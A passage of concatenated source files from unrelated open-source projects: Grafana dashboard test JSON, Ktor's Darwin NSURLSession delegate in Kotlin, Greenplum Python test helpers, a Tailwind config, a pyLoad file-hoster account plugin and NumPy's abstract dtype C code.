"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "labelDatacenterRegion",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueTime",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueNumeric",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueText",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueCalc",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "fieldName",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
}
]
},
"time": {
"from": "now-6h",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
]
},
"timezone": "",
"title": "Datalinks - variables",
"uid": "wfTJJL5Wz",
"weekStart": ""
} | json | github | https://github.com/grafana/grafana | apps/dashboard/pkg/migration/conversion/testdata/input/migrated_dev_dashboards/feature-templating/v1beta1.testdata-datalinks.v42.json |
/*
* Copyright 2014-2025 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.engine.darwin
import io.ktor.client.engine.darwin.internal.*
import io.ktor.client.plugins.websocket.WEBSOCKETS_KEY
import io.ktor.client.request.*
import io.ktor.util.collections.*
import io.ktor.utils.io.InternalAPI
import io.ktor.websocket.ChannelConfig
import kotlinx.cinterop.ExperimentalForeignApi
import kotlinx.cinterop.UnsafeNumber
import kotlinx.cinterop.convert
import kotlinx.coroutines.CompletableDeferred
import platform.Foundation.*
import platform.darwin.NSObject
import kotlin.collections.set
import kotlin.coroutines.CoroutineContext
// Initial capacities for the per-session task maps kept by the delegate.
private const val HTTP_REQUESTS_INITIAL_CAPACITY = 32
private const val WS_REQUESTS_INITIAL_CAPACITY = 16

/**
 * Creates an instance of [KtorNSURLSessionDelegate] without a custom
 * challenge handler.
 *
 * [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate)
 */
@OptIn(UnsafeNumber::class)
public fun KtorNSURLSessionDelegate(): KtorNSURLSessionDelegate = KtorNSURLSessionDelegate(null)
/**
* A delegate for [NSURLSession] that bridges it to Ktor.
* If users set custom session in [DarwinClientEngineConfig.sessionAndDelegate],
* they need to register this delegate in their session.
* This can be done by registering it directly,
* extending their custom delegate from it
* or by calling required methods from their custom delegate.
*
 * For HTTP requests to work properly, it's important that users call these functions:
* * URLSession:dataTask:didReceiveData:
* * URLSession:task:didCompleteWithError:
* * URLSession:task:willPerformHTTPRedirection:newRequest:completionHandler:
*
* For WebSockets to work, it's important that users call these functions:
* * URLSession:webSocketTask:didOpenWithProtocol:
* * URLSession:webSocketTask:didCloseWithCode:reason:
*
* [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate)
*/
@OptIn(UnsafeNumber::class)
public class KtorNSURLSessionDelegate(
internal val challengeHandler: ChallengeHandler?
) : NSObject(), NSURLSessionDataDelegateProtocol, NSURLSessionWebSocketDelegateProtocol {
private val taskHandlers: ConcurrentMap<NSURLSessionTask, DarwinTaskHandler> =
ConcurrentMap(HTTP_REQUESTS_INITIAL_CAPACITY)
private val webSocketSessions: ConcurrentMap<NSURLSessionWebSocketTask, DarwinWebsocketSession> =
ConcurrentMap(WS_REQUESTS_INITIAL_CAPACITY)
override fun URLSession(session: NSURLSession, dataTask: NSURLSessionDataTask, didReceiveData: NSData) {
val taskHandler = taskHandlers[dataTask] ?: return
taskHandler.receiveData(dataTask, didReceiveData)
}
override fun URLSession(session: NSURLSession, taskIsWaitingForConnectivity: NSURLSessionTask) {
}
override fun URLSession(session: NSURLSession, task: NSURLSessionTask, didCompleteWithError: NSError?) {
taskHandlers[task]?.let {
it.complete(task, didCompleteWithError)
taskHandlers.remove(task)
}
webSocketSessions[task]?.didComplete(didCompleteWithError)
}
override fun URLSession(
session: NSURLSession,
webSocketTask: NSURLSessionWebSocketTask,
didOpenWithProtocol: String?
) {
val wsSession = webSocketSessions[webSocketTask] ?: return
wsSession.didOpen(didOpenWithProtocol)
}
override fun URLSession(
session: NSURLSession,
webSocketTask: NSURLSessionWebSocketTask,
didCloseWithCode: NSURLSessionWebSocketCloseCode,
reason: NSData?
) {
val wsSession = webSocketSessions[webSocketTask] ?: return
wsSession.didClose(didCloseWithCode, reason, webSocketTask)
}
/**
 * Registers a websocket [task] and returns a deferred that completes once the
 * websocket response (upgrade) is available.
 *
 * Note: the task must not be resumed before this returns — the maximum
 * message size has to be configured first (see comment below).
 */
internal fun read(
    request: HttpRequestData,
    task: NSURLSessionWebSocketTask,
    callContext: CoroutineContext
): CompletableDeferred<HttpResponseData> {
    @OptIn(InternalAPI::class)
    val wsConfig = request.attributes[WEBSOCKETS_KEY]
    val taskHandler = DarwinWebsocketSession(
        callContext,
        task,
        wsConfig.channelsConfig
    )
    // Register before the task starts so delegate callbacks find the session.
    webSocketSessions[task] = taskHandler
    // Fields MUST be assigned to the task BEFORE starting it.
    // The "maximum message size" actually refers to the underlying buffer,
    // so it will allow >= maxFrameSize, depending on how quickly our bytes are read to the buffer.
    @OptIn(ExperimentalForeignApi::class)
    task.setMaximumMessageSize(wsConfig.maxFrameSize.convert())
    return taskHandler.response
}
/**
 * Registers a plain HTTP [task] and returns a deferred completed with the
 * response data once the task finishes.
 */
internal fun read(
    request: HttpRequestData,
    callContext: CoroutineContext,
    task: NSURLSessionTask
): CompletableDeferred<HttpResponseData> {
    return DarwinTaskHandler(request, callContext)
        .also { taskHandlers[task] = it }
        .response
}
/**
 * Disable embedded redirects.
 *
 * Passing `null` to [completionHandler] tells NSURLSession NOT to follow the
 * redirect; redirect handling is done at the Ktor level instead.
 *
 * [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate.URLSession)
 */
override fun URLSession(
    session: NSURLSession,
    task: NSURLSessionTask,
    willPerformHTTPRedirection: NSHTTPURLResponse,
    newRequest: NSURLRequest,
    completionHandler: (NSURLRequest?) -> Unit
) {
    completionHandler(null)
}
/**
 * Handle challenge.
 *
 * Delegates authentication challenges to the user-supplied [challengeHandler]
 * when one is configured; otherwise falls back to NSURLSession's default
 * handling with the proposed credential.
 *
 * [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate.URLSession)
 */
override fun URLSession(
    session: NSURLSession,
    task: NSURLSessionTask,
    didReceiveChallenge: NSURLAuthenticationChallenge,
    completionHandler: (NSURLSessionAuthChallengeDisposition, NSURLCredential?) -> Unit
) {
    val handler = challengeHandler ?: run {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, didReceiveChallenge.proposedCredential)
        return
    }
    try {
        handler(session, task, didReceiveChallenge, completionHandler)
    } catch (cause: Throwable) {
        // Record the user handler's failure on the task so the request fails
        // with the real cause, then cancel the challenge.
        taskHandlers[task]?.saveFailure(cause)
        completionHandler(NSURLSessionAuthChallengeCancelAuthenticationChallenge, null)
    }
}
} | kotlin | github | https://github.com/ktorio/ktor | ktor-client/ktor-client-darwin/darwin/src/io/ktor/client/engine/darwin/KtorNSURLSessionDelegate.kt |
// Fixture export: returns the constant 1.
export function generateSummary() {
    const value = 1;
    return value;
}
// Fixture export: returns the constant 2.
export function entityActionQueue() {
    const value = 2;
    return value;
}
// Fixture export: returns the constant 3.
export function bar() {
    const value = 3;
    return value;
}
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
import tinctest
from tinctest.lib import local_path
from mpp.lib.PSQL import PSQL
from tinctest.lib import run_shell_command
from gppylib.commands.base import Command
from gppylib.db import dbconn
class Disk():
    '''Methods relating to disk usage, dca disk policy etc'''

    def __init__(self):
        pass

    def get_disk_usage(self, hostname, partition='/data'):
        '''Return (rc, stdout) of a remote ``df`` on *partition* at *hostname*.

        stdout holds the fourth column of ``df`` output (one value per line);
        rc is the shell return code.
        '''
        cmd_str = "ssh %s df %s | grep -v Filesystem |awk \'{print $4}\'" % (hostname, partition)
        results = {'rc': 0, 'stdout': '', 'stderr': ''}
        run_shell_command(cmd_str, results=results)
        # BUG FIX: the original returned the undefined name `results1`,
        # which raised NameError on every call.
        return results['rc'], results['stdout']
class Database():
    '''Helpers to create/drop test databases and inspect the server build.'''

    def setupDatabase(self, dbname=None):
        '''Drop (if present) and re-create *dbname*; defaults to $USER.

        Raises Exception when the create step fails.
        '''
        if dbname is None:
            dbname = os.environ["USER"]
        cmd = Command(name='Drop if exists and Create the database',
                      cmdStr='dropdb %s;createdb %s' % (dbname, dbname))
        cmd.run()
        if cmd.get_results().rc != 0:
            raise Exception("Create database %s failed" % dbname)
        tinctest.logger.info("Database %s is created" % dbname)

    def dropDatabase(self, dbname=None):
        '''Drop *dbname*; a name is required. Raises Exception on failure.'''
        if dbname is None:
            raise Exception(' No database name provided')
        cmd = Command(name='Drop database', cmdStr='dropdb %s' % (dbname))
        cmd.run()
        if cmd.get_results().rc != 0:
            raise Exception("Drop database %s failed" % dbname)
        # Typo fix: "droped" -> "dropped".
        tinctest.logger.info("Database %s is dropped" % dbname)

    def is_debug(self):
        '''Return True when the server version string mentions 'assert'
        (i.e. a cassert/debug build), else False.'''
        version_str = PSQL.run_sql_command('select version();', flags='-q -t', dbname='postgres')
        # Single-argument parenthesized print works under both py2 and py3.
        print(version_str)
        if 'assert' in version_str:
            return True
        # Explicit False instead of the original implicit None (both falsy).
        return False
class Config():
    '''Accessors over gp_segment_configuration.'''

    def __init__(self):
        pass

    def getMasterMirrorHostname(self):
        '''Return the hostname of the standby master (content=-1, role='m'),
        stripped of whitespace; empty string when no standby exists.
        '''
        sql_cmd = "select hostname from gp_segment_configuration where content = -1 and role = 'm'"
        out = PSQL.run_sql_command(sql_cmd, dbname='template1')
        # Dead-code fix: the original had an unreachable `return False`
        # after this return statement.
        return out.strip()
/** @type {import('tailwindcss').Config} */
module.exports = {
  // Files Tailwind scans to detect which utility classes are used.
  content: [
    "./pages/**/*.{js,ts,jsx,tsx}",
    "./components/**/*.{js,ts,jsx,tsx}",
  ],
  theme: {
    // Default sans stack comes from the CSS variable set by next/font.
    fontFamily: {
      sans: ["var(--font-montserrat)"],
    },
  },
  future: {
    // Apply hover variants only on devices that actually support hover.
    hoverOnlyWhenSupported: true,
  },
  plugins: [require("@tailwindcss/aspect-ratio")],
};
# -*- coding: utf-8 -*-
import re
import time
import urlparse
from module.plugins.internal.Account import Account
from module.plugins.internal.Plugin import parse_html_form, set_cookie
class XFSAccount(Account):
    """Account support for XFileSharing-based hosters.

    Subclasses normally only set HOSTER_DOMAIN (and optionally override the
    regex patterns) to adapt to a specific site.
    """
    __name__    = "XFSAccount"
    __type__    = "account"
    __version__ = "0.42"
    __status__  = "testing"

    __description__ = """XFileSharing account plugin"""
    __license__     = "GPLv3"
    __authors__     = [("zoidberg"      , "zoidberg@mujmail.cz"),
                       ("Walter Purcaro", "vuolter@gmail.com"  )]

    HOSTER_DOMAIN = None
    HOSTER_URL    = None
    LOGIN_URL     = None

    COOKIES = True

    # Regexes applied to the account page to extract premium state,
    # expiration date and traffic quotas.
    PREMIUM_PATTERN = r'\(Premium only\)'

    VALID_UNTIL_PATTERN = r'Premium.[Aa]ccount expire:.*?(\d{1,2} [\w^_]+ \d{4})'

    TRAFFIC_LEFT_PATTERN = r'Traffic available today:.*?<b>\s*(?P<S>[\d.,]+|[Uu]nlimited)\s*(?:(?P<U>[\w^_]+)\s*)?</b>'
    TRAFFIC_LEFT_UNIT    = "MB"  #: Used only if no group <U> was found

    LEECH_TRAFFIC_PATTERN = r'Leech Traffic left:<b>.*?(?P<S>[\d.,]+|[Uu]nlimited)\s*(?:(?P<U>[\w^_]+)\s*)?</b>'
    LEECH_TRAFFIC_UNIT    = "MB"  #: Used only if no group <U> was found

    LOGIN_FAIL_PATTERN = r'Incorrect Login or Password|account was banned|Error<'

    def parse_info(self, user, password, data, req):
        """Scrape the "my account" page and return a dict with keys
        validuntil, trafficleft, leechtraffic and premium.

        -1 means "unlimited"/"no expiry"; None means "unknown".
        """
        validuntil   = None
        trafficleft  = None
        leechtraffic = None
        premium      = None

        if not self.HOSTER_URL:  #@TODO: Remove in 0.4.10
            return {'validuntil'  : validuntil,
                    'trafficleft' : trafficleft,
                    'leechtraffic': leechtraffic,
                    'premium'     : premium}

        html = self.load(self.HOSTER_URL,
                         get={'op': "my_account"},
                         cookies=self.COOKIES)

        premium = True if re.search(self.PREMIUM_PATTERN, html) else False

        m = re.search(self.VALID_UNTIL_PATTERN, html)
        if m:
            expiredate = m.group(1).strip()
            self.log_debug("Expire date: " + expiredate)

            try:
                validuntil = time.mktime(time.strptime(expiredate, "%d %B %Y"))

            # `except ... as` is valid on py2.6+ too (fixes py3-incompatible syntax)
            except Exception as e:
                self.log_error(e)

            else:
                self.log_debug("Valid until: %s" % validuntil)

                if validuntil > time.mktime(time.gmtime()):
                    premium     = True
                    trafficleft = -1
                else:
                    premium    = False
                    validuntil = None  #: Registered account type (not premium)
        else:
            self.log_debug("VALID_UNTIL_PATTERN not found")

        m = re.search(self.TRAFFIC_LEFT_PATTERN, html)
        if m:
            try:
                traffic = m.groupdict()
                size    = traffic['S']

                if "nlimited" in size:  #: Matches both "unlimited" and "Unlimited"
                    trafficleft = -1
                    if validuntil is None:
                        validuntil = -1
                else:
                    if 'U' in traffic:
                        unit = traffic['U']
                    elif isinstance(self.TRAFFIC_LEFT_UNIT, basestring):
                        unit = self.TRAFFIC_LEFT_UNIT
                    else:
                        unit = ""

                    trafficleft = self.parse_traffic(size + unit)

            except Exception as e:
                self.log_error(e)
        else:
            self.log_debug("TRAFFIC_LEFT_PATTERN not found")

        leech = [m.groupdict() for m in re.finditer(self.LEECH_TRAFFIC_PATTERN, html)]
        if leech:
            leechtraffic = 0
            try:
                for traffic in leech:
                    size = traffic['S']

                    if "nlimited" in size:
                        leechtraffic = -1
                        if validuntil is None:
                            validuntil = -1
                        break
                    else:
                        if 'U' in traffic:
                            unit = traffic['U']
                        elif isinstance(self.LEECH_TRAFFIC_UNIT, basestring):
                            unit = self.LEECH_TRAFFIC_UNIT
                        else:
                            unit = ""

                        leechtraffic += self.parse_traffic(size + unit)

            except Exception as e:
                self.log_error(e)
        else:
            self.log_debug("LEECH_TRAFFIC_PATTERN not found")

        return {'validuntil'  : validuntil,
                'trafficleft' : trafficleft,
                'leechtraffic': leechtraffic,
                'premium'     : premium}

    def login(self, user, password, data, req):
        """Log into the hoster, forcing the English locale via a cookie so
        the patterns in parse_info match. Calls login_fail on bad credentials.
        """
        if self.HOSTER_DOMAIN:
            if not self.HOSTER_URL:
                self.HOSTER_URL = "http://www.%s/" % self.HOSTER_DOMAIN

            if self.COOKIES:
                if isinstance(self.COOKIES, list) and not self.COOKIES.count((self.HOSTER_DOMAIN, "lang", "english")):
                    # BUG FIX: list.insert() requires an index; the original
                    # `self.COOKIES.insert(tuple)` raised TypeError.
                    self.COOKIES.append((self.HOSTER_DOMAIN, "lang", "english"))
                else:
                    set_cookie(self.req.cj, self.HOSTER_DOMAIN, "lang", "english")

        if not self.HOSTER_URL:
            self.login_fail(_("Missing HOSTER_URL"))

        if not self.LOGIN_URL:
            self.LOGIN_URL = urlparse.urljoin(self.HOSTER_URL, "login.html")
        html = self.load(self.LOGIN_URL, cookies=self.COOKIES)

        action, inputs = parse_html_form('name="FL"', html)
        if not inputs:
            inputs = {'op'      : "login",
                      'redirect': self.HOSTER_URL}

        inputs.update({'login'   : user,
                       'password': password})

        if action:
            url = urlparse.urljoin("http://", action)
        else:
            url = self.HOSTER_URL

        html = self.load(url, post=inputs, cookies=self.COOKIES)

        if re.search(self.LOGIN_FAIL_PATTERN, html):
            self.login_fail()
#define NPY_NO_DEPRECATED_API NPY_API_VERSION
#define _MULTIARRAYMODULE
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include <structmember.h>
#include "numpy/ndarraytypes.h"
#include "numpy/arrayobject.h"
#include "dtypemeta.h"
#include "abstractdtypes.h"
#include "array_coercion.h"
#include "common.h"
/* Default descriptor for abstract Python-int: the pointer-sized integer. */
static inline PyArray_Descr *
int_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
    PyArray_Descr *descr = PyArray_DescrFromType(NPY_INTP);
    return descr;
}
/*
 * Pick a descriptor for a Python int literal: intp if it fits, otherwise
 * longlong, then unsigned longlong, and finally object for huge values.
 */
static PyArray_Descr *
discover_descriptor_from_pylong(
        PyArray_DTypeMeta *NPY_UNUSED(cls), PyObject *obj)
{
    assert(PyLong_Check(obj));

    long long as_signed = PyLong_AsLongLong(obj);
    if (!error_converting(as_signed)) {
        if (NPY_MIN_INTP <= as_signed && as_signed <= NPY_MAX_INTP) {
            return PyArray_DescrFromType(NPY_INTP);
        }
        return PyArray_DescrFromType(NPY_LONGLONG);
    }
    /* Overflowed signed range: clear the error and try unsigned. */
    PyErr_Clear();

    unsigned long long as_unsigned = PyLong_AsUnsignedLongLong(obj);
    if (!(as_unsigned == (unsigned long long)-1 && PyErr_Occurred())) {
        return PyArray_DescrFromType(NPY_ULONGLONG);
    }
    PyErr_Clear();

    /* Too large for any fixed-width integer: fall back to object. */
    return PyArray_DescrFromType(NPY_OBJECT);
}
/* Default descriptor for abstract Python-float: double precision. */
static inline PyArray_Descr *
float_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
    PyArray_Descr *descr = PyArray_DescrFromType(NPY_DOUBLE);
    return descr;
}
/* A Python float is always represented as a C double. */
static PyArray_Descr*
discover_descriptor_from_pyfloat(
        PyArray_DTypeMeta* NPY_UNUSED(cls), PyObject *obj)
{
    assert(PyFloat_CheckExact(obj));
    PyArray_Descr *descr = PyArray_DescrFromType(NPY_DOUBLE);
    return descr;
}
/* Default descriptor for abstract Python-complex: complex double. */
static inline PyArray_Descr *
complex_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
    PyArray_Descr *descr = PyArray_DescrFromType(NPY_CDOUBLE);
    return descr;
}
/* A Python complex is always represented as complex128. */
static PyArray_Descr*
discover_descriptor_from_pycomplex(
        PyArray_DTypeMeta* NPY_UNUSED(cls), PyObject *obj)
{
    assert(PyComplex_CheckExact(obj));
    PyArray_Descr *descr = PyArray_DescrFromType(NPY_COMPLEX128);
    return descr;
}
/*
 * Ready the abstract and Python-scalar DTypes and register them with the
 * scalar-discovery machinery. Returns 0 on success, -1 with an exception set
 * on failure. Must run once during multiarray module initialization, before
 * any array coercion takes place.
 */
NPY_NO_EXPORT int
initialize_and_map_pytypes_to_dtypes()
{
    /* Ready the abstract bases first; the concrete pyscalar DTypes below
     * use them as tp_base. */
    if (PyType_Ready((PyTypeObject *)&PyArray_IntAbstractDType) < 0) {
        return -1;
    }
    if (PyType_Ready((PyTypeObject *)&PyArray_FloatAbstractDType) < 0) {
        return -1;
    }
    if (PyType_Ready((PyTypeObject *)&PyArray_ComplexAbstractDType) < 0) {
        return -1;
    }
    /*
     * Delayed assignments to avoid "error C2099: initializer is not a constant"
     * in windows compilers. Can hopefully be done in structs in the future.
     */
    ((PyTypeObject *)&PyArray_PyLongDType)->tp_base =
        (PyTypeObject *)&PyArray_IntAbstractDType;
    PyArray_PyLongDType.scalar_type = &PyLong_Type;
    if (PyType_Ready((PyTypeObject *)&PyArray_PyLongDType) < 0) {
        return -1;
    }
    ((PyTypeObject *)&PyArray_PyFloatDType)->tp_base =
        (PyTypeObject *)&PyArray_FloatAbstractDType;
    PyArray_PyFloatDType.scalar_type = &PyFloat_Type;
    if (PyType_Ready((PyTypeObject *)&PyArray_PyFloatDType) < 0) {
        return -1;
    }
    ((PyTypeObject *)&PyArray_PyComplexDType)->tp_base =
        (PyTypeObject *)&PyArray_ComplexAbstractDType;
    PyArray_PyComplexDType.scalar_type = &PyComplex_Type;
    if (PyType_Ready((PyTypeObject *)&PyArray_PyComplexDType) < 0) {
        return -1;
    }

    /* Register the new DTypes for discovery */
    if (_PyArray_MapPyTypeToDType(
            &PyArray_PyLongDType, &PyLong_Type, NPY_FALSE) < 0) {
        return -1;
    }
    if (_PyArray_MapPyTypeToDType(
            &PyArray_PyFloatDType, &PyFloat_Type, NPY_FALSE) < 0) {
        return -1;
    }
    if (_PyArray_MapPyTypeToDType(
            &PyArray_PyComplexDType, &PyComplex_Type, NPY_FALSE) < 0) {
        return -1;
    }

    /*
     * Map str, bytes, and bool, for which we do not need abstract versions
     * to the NumPy DTypes. This is done here using the `is_known_scalar_type`
     * function.
     * TODO: The `is_known_scalar_type` function is considered preliminary,
     *       the same could be achieved e.g. with additional abstract DTypes.
     */
    PyArray_DTypeMeta *dtype;
    dtype = typenum_to_dtypemeta(NPY_UNICODE);
    if (_PyArray_MapPyTypeToDType(dtype, &PyUnicode_Type, NPY_FALSE) < 0) {
        return -1;
    }

    dtype = typenum_to_dtypemeta(NPY_STRING);
    if (_PyArray_MapPyTypeToDType(dtype, &PyBytes_Type, NPY_FALSE) < 0) {
        return -1;
    }
    dtype = typenum_to_dtypemeta(NPY_BOOL);
    if (_PyArray_MapPyTypeToDType(dtype, &PyBool_Type, NPY_FALSE) < 0) {
        return -1;
    }

    return 0;
}
/*
* The following functions define the "common DType" for the abstract dtypes.
*
* Note that the logic with respect to the "higher" dtypes such as floats
* could likely be more logically defined for them, but since NumPy dtypes
* largely "know" each other, that is not necessary.
*/
/*
 * Common-DType slot for the Python-int abstract DType. Returns a new
 * reference to the common DType, or Py_NotImplemented (incref'd) when no
 * rule applies here.
 */
static PyArray_DTypeMeta *
int_common_dtype(PyArray_DTypeMeta *NPY_UNUSED(cls), PyArray_DTypeMeta *other)
{
    if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
        if (other->type_num == NPY_BOOL) {
            /* Use the default integer for bools: */
            return NPY_DT_NewRef(&PyArray_IntpDType);
        }
    }
    else if (NPY_DT_is_legacy(other)) {
        /* This is a back-compat fallback to usually do the right thing... */
        /* First probe uint8: asks `other` if it can promote with it. */
        PyArray_DTypeMeta *uint8_dt = &PyArray_UInt8DType;
        PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, uint8_dt);
        if (res == NULL) {
            PyErr_Clear();
        }
        else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
            Py_DECREF(res);
        }
        else {
            return res;
        }
        /* Try again with `int8`, an error may have been set, though */
        PyArray_DTypeMeta *int8_dt = &PyArray_Int8DType;
        res = NPY_DT_CALL_common_dtype(other, int8_dt);
        if (res == NULL) {
            PyErr_Clear();
        }
        else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
            Py_DECREF(res);
        }
        else {
            return res;
        }
        /* And finally, we will try the default integer, just for sports... */
        PyArray_DTypeMeta *default_int = &PyArray_IntpDType;
        res = NPY_DT_CALL_common_dtype(other, default_int);
        if (res == NULL) {
            PyErr_Clear();
        }
        /* NOTE: may return NotImplemented from the last probe as-is. */
        return res;
    }
    Py_INCREF(Py_NotImplemented);
    return (PyArray_DTypeMeta *)Py_NotImplemented;
}
/*
 * Common-DType slot for the Python-float abstract DType: bools/ints promote
 * to double; the Python-int pyscalar is absorbed by this DType itself;
 * other legacy DTypes are probed via half then double.
 */
static PyArray_DTypeMeta *
float_common_dtype(PyArray_DTypeMeta *cls, PyArray_DTypeMeta *other)
{
    if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
        if (other->type_num == NPY_BOOL || PyTypeNum_ISINTEGER(other->type_num)) {
            /* Use the default float (double) for bools and ints: */
            return NPY_DT_NewRef(&PyArray_DoubleDType);
        }
    }
    else if (other == &PyArray_PyLongDType) {
        /* float "wins" over a Python int scalar. */
        Py_INCREF(cls);
        return cls;
    }
    else if (NPY_DT_is_legacy(other)) {
        /* This is a back-compat fallback to usually do the right thing... */
        PyArray_DTypeMeta *half_dt = &PyArray_HalfDType;
        PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, half_dt);
        if (res == NULL) {
            PyErr_Clear();
        }
        else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
            Py_DECREF(res);
        }
        else {
            return res;
        }
        /* Retry with double (the default float) */
        PyArray_DTypeMeta *double_dt = &PyArray_DoubleDType;
        res = NPY_DT_CALL_common_dtype(other, double_dt);
        return res;
    }
    Py_INCREF(Py_NotImplemented);
    return (PyArray_DTypeMeta *)Py_NotImplemented;
}
/*
 * Common-DType slot for the Python-complex abstract DType: bools/ints
 * promote to cdouble; Python int/float pyscalars are absorbed by this
 * DType; other legacy DTypes are probed via cfloat then cdouble.
 */
static PyArray_DTypeMeta *
complex_common_dtype(PyArray_DTypeMeta *cls, PyArray_DTypeMeta *other)
{
    if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
        if (other->type_num == NPY_BOOL ||
                PyTypeNum_ISINTEGER(other->type_num)) {
            /* Use the default complex (cdouble) for bools and ints: */
            return NPY_DT_NewRef(&PyArray_CDoubleDType);
        }
    }
    else if (NPY_DT_is_legacy(other)) {
        /* This is a back-compat fallback to usually do the right thing... */
        PyArray_DTypeMeta *cfloat_dt = &PyArray_CFloatDType;
        PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, cfloat_dt);
        if (res == NULL) {
            PyErr_Clear();
        }
        else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
            Py_DECREF(res);
        }
        else {
            return res;
        }
        /* Retry with cdouble (the default complex) */
        PyArray_DTypeMeta *cdouble_dt = &PyArray_CDoubleDType;
        res = NPY_DT_CALL_common_dtype(other, cdouble_dt);
        return res;
    }
    else if (other == &PyArray_PyLongDType ||
             other == &PyArray_PyFloatDType) {
        /* complex "wins" over Python int/float scalars. */
        Py_INCREF(cls);
        return cls;
    }
    Py_INCREF(Py_NotImplemented);
    return (PyArray_DTypeMeta *)Py_NotImplemented;
}
/*
* Define abstract numerical DTypes that all regular ones can inherit from
* (in arraytypes.c.src).
* Here, also define types corresponding to the python scalars.
*/
/* Abstract base DType for integers; never instantiated (NPY_DT_ABSTRACT). */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_IntAbstractDType = {{{
        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._IntegerAbstractDType",
        .tp_base = &PyArrayDescr_Type,
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .flags = NPY_DT_ABSTRACT,
};

/* Slots wiring the Python-int pyscalar DType to its discovery/promotion
 * functions defined above. */
NPY_DType_Slots pylongdtype_slots = {
    .discover_descr_from_pyobject = discover_descriptor_from_pylong,
    .default_descr = int_default_descriptor,
    .common_dtype = int_common_dtype,
};

/* DType representing a bare Python `int` during coercion/promotion. */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyLongDType = {{{
        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._PyLongDType",
        .tp_base = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .dt_slots = &pylongdtype_slots,
    .scalar_type = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
};

/* Abstract base DType for floats. */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_FloatAbstractDType = {{{
        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._FloatAbstractDType",
        .tp_base = &PyArrayDescr_Type,
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .flags = NPY_DT_ABSTRACT,
};

NPY_DType_Slots pyfloatdtype_slots = {
    .discover_descr_from_pyobject = discover_descriptor_from_pyfloat,
    .default_descr = float_default_descriptor,
    .common_dtype = float_common_dtype,
};

/* DType representing a bare Python `float`. */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyFloatDType = {{{
        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._PyFloatDType",
        .tp_base = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .dt_slots = &pyfloatdtype_slots,
    .scalar_type = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
};

/* Abstract base DType for complex numbers. */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_ComplexAbstractDType = {{{
